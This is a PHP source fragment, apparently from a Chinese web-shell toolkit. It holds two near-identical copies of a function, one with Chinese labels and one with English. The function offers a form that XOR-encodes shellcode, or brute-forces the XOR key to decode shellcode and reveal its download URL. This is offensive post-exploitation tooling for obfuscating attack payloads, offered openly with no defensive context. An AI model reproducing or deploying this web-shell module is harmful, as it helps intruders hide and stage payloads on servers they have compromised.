function Shellcode_j() { $Oday_value = '0'; $Shell_Code = ''; $checkeda = 'checked'; $checkedb = ''; if (!empty($_POST['code'])) { if ($_POST['xor'] == 'a' && isset($_POST['number'])) { $Oday_value = $_POST['number']; $Shell_Code = shellcode_encode($_POST['code'], $Oday_value); } if ($_POST['xor'] == 'b') { $checkeda = ''; $checkedb = ' checked'; $Shell_Code_Array = shellcode_findxor($_POST['code']); $Shell_Code = $Shell_Code_Array[0]; $Oday_value = $Shell_Code_Array[1]; } if (!$Oday_value) { $Oday_value = '0'; } if (!$Shell_Code) { $Shell_Code = '找不到shellcode的下载url'; } $Shell_Code = htmlspecialchars($Shell_Code); } print <<<END <form method="POST" name="bbform" id="bbform" action="?s=bb"> <div class="actall">XOR(节点):<input name="number" value="{$Oday_value}" type="text" style="width:50px"> <input type="radio" name="xor" value="a"{$checkeda}>XOR转换 <input type="radio" name="xor" value="b"{$checkedb}>XOR反转换</div> <div class="actall"><textarea name="code" rows="20" cols="110">{$Shell_Code}</textarea></div> <div class="actall"><input class="bt" type="submit" value="执行"></div> </form> END; return true; }
function Shellcode_j() { $Oday_value = '0'; $Shell_Code = ''; $checkeda = ' checked'; $checkedb = ''; if (!empty($_POST['code'])) { if ($_POST['xor'] == 'a' && isset($_POST['number'])) { $Oday_value = $_POST['number']; $Shell_Code = shellcode_encode($_POST['code'], $Oday_value); } if ($_POST['xor'] == 'b') { $checkeda = ''; $checkedb = ' checked'; $Shell_Code_Array = shellcode_findxor($_POST['code']); $Shell_Code = $Shell_Code_Array[0]; $Oday_value = $Shell_Code_Array[1]; } if (!$Oday_value) { $Oday_value = '0'; } if (!$Shell_Code) { $Shell_Code = 'could not find the shellcode download url'; } $Shell_Code = htmlspecialchars($Shell_Code); } print <<<END <form method="POST" name="jform" id="jform" action="?s=j"> <div class="actall">XOR Value:<input name="number" value="{$Oday_value}" type="text" style="width:50px"> <input type="radio" name="xor" value="a"{$checkeda}>encode shellcode with XOR <input type="radio" name="xor" value="b"{$checkedb}>decode shellcode with XOR</div> <div class="actall"><textarea name="code" rows="20" cols="165">{$Shell_Code}</textarea></div> <div class="actall"><input class="bt" type="submit" value="Convert"></div> </form> END; return true; }